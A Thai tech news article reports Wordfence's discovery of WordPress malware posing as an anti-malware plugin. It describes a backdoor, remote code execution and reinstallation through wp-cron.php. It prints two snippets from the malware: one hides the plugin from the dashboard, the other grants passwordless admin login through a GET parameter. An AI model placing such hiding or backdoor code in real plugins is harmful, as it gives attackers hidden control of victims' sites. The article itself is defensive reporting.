ระวังมัลแวร์ WordPress ตัวใหม่ ปลอมตัวเป็นปลั๊กอินสำหรับต่อต้านมัลแวร์

WordPress นั้นถึงแม้จะเป็นเครื่องมือสร้างเว็บไซต์ที่ได้รับความนิยมสูงสุดในโลก แต่ก็มักจะมาพร้อมกับข่าวการโดนแฮก หรือมาถูกแพร่กระจายมัลแวร์อย่างไม่หยุดหย่อนจนผู้ดูแลต้องหาระบบรักษาความปลอดภัยที่มีประสิทธิภาพมาใช้งาน นั่นนำไปสู่กับดักแบบซ้อนแผนของแฮกเกอร์

จากรายงานโดยเว็บไซต์ Cyber Security News ได้กล่าวถึงการตรวจพบมัลแวร์ตัวใหม่บน WordPress ที่ได้ทำการปลอมตัวเป็นปลั๊กอินสำหรับการจัดการความปลอดภัยบนระบบดังกล่าวภายใต้ชื่อว่า ‘WP-antymalwary-bot.php’ และ ‘wp-performance-booster.php’ โดยการตรวจพบดังกล่าวนั้น เป็นผลงานของทีมวิจัยจาก Wordfence บริษัทผู้เชี่ยวชาญด้านการพัฒนาปลั๊กอินสำหรับการจัดการความปลอดภัยบน WordPress ซึ่งทางทีมวิจัยได้เปิดเผยว่า แม้จะตั้งชื่อต่างกัน แต่ทั้ง 2 ไฟล์นั้นเป็นมัลแวร์ตัวเดียวกัน

สำหรับมัลแวร์ดังกล่าวนี้ ตัวมัลแวร์มีความสามารถหลายอย่างไม่ว่าจะเป็น การรันโค้ดจากระยะไกล (Remote Code Execution หรือ RCE), การยิงโค้ดอันตรายใส่เว็บไซต์, การยิง JavaScript เพื่อใช้ในการแสดงผลโฆษณาตามที่แฮกเกอร์ต้องการบนเว็บไซต์ของเหยื่อ, การเข้าใช้งานด้วยสิทธิ์การใช้งานระดับผู้ดูแลระบบ (Admin หรือ Administrator) รวมไปถึงความสามารถในการเปิดประตูหลังของระบบ (Backdoor) เพื่อให้แฮกเกอร์สามารถเข้าจัดการควบคุมระบบตามต้องการได้อีกด้วย ที่ร้ายไปกว่านั้น ตัวมัลแวร์ยังมีความสามารถในการติดตั้งตัวเองซ้ำถึงแม้จะถูกลบไปแล้ว ด้วยการจัดการสอดแทรกโค้ดของมัลแวร์ไว้บนไฟล์ wp-cron.php ซึ่งจะติดตั้งตัวเองใหม่ทุกครั้งเมื่อมีคนเข้าสู่เว็บไซต์ที่ติดมัลแวร์

ทางทีมวิจัยได้เปิดเผยอีกว่า มัลแวร์ดังกล่าวนี้มีการซ่อนตัวจากการตรวจจับของระบบ WordPress Dashboard ด้วยการแทรกฟังก์ชันพิเศษ

// Function to hide plugin from list

function hide_plugin_from_list($plugins) {

if (is_admin() && isset($plugins[plugin_basename(FILE)])) {

unset($plugins[plugin_basename(FILE)]);

}

return $plugins;

}

add_filter('all_plugins', 'hide_plugin_from_list');

ซึ่งจะช่วยให้ตัวมัลแวร์นั้นแอบซ่อนชื่อของปลั๊กอินไม่ให้ปรากฏบน Dashboard ได้ และนอกจากนั้น ทางทีมวิจัยยังได้เปิดเผยว่า ตัวมัลแวร์ได้มีการเข้าถึงสิทธิ์การใช้งานระดับผู้ดูแลโดยที่ไม่ต้องมีการยืนยันตัวตนด้วยการใช้รหัสผ่าน (Password) ผ่านทางการใช้ฟังก์ชัน

function emergency_login_all_admins() {

if (isset($GET['emergency_login']) && $GET['emergency_login'] === [REDACTED]) {

$admins = get_users(['role' => 'administrator']);

if (!empty($admins)) {

$admin = reset($admins);

wp_set_auth_cookie($admin->ID, true);

wp_redirect(admin_url());

exit;

}

}

}

แต่ก็ไม่ต้องกังวลใจ ทาง Wordfence ได้เปิดเผยว่า สำหรับผู้ใช้งานเครื่องมือรักษาความปลอดภัยบนเว็บไซต์ของทางบริษัทในเวอร์ชัน Premium (แบบจ่ายเงิน) ทางทีมงานได้ทำการอัปเดตระบบตรวจจับไปเป็นที่เรียบร้อยแล้วในวันที่ 24 มกราคม ที่ผ่านมา และสำหรับเวอร์ชันใช้งานฟรีนั้น ทางทีมพัฒนาจะทำการอัปเดตให้ใช้งานในวันที่ 23 พฤษภาคม นี้

➤ Website : https://www.thaiware.com
➤ Facebook : https://www.facebook.com/thaiware
➤ Twitter : https://www.twitter.com/thaiware
➤ YouTube : https://www.youtube.com/thaiwaretv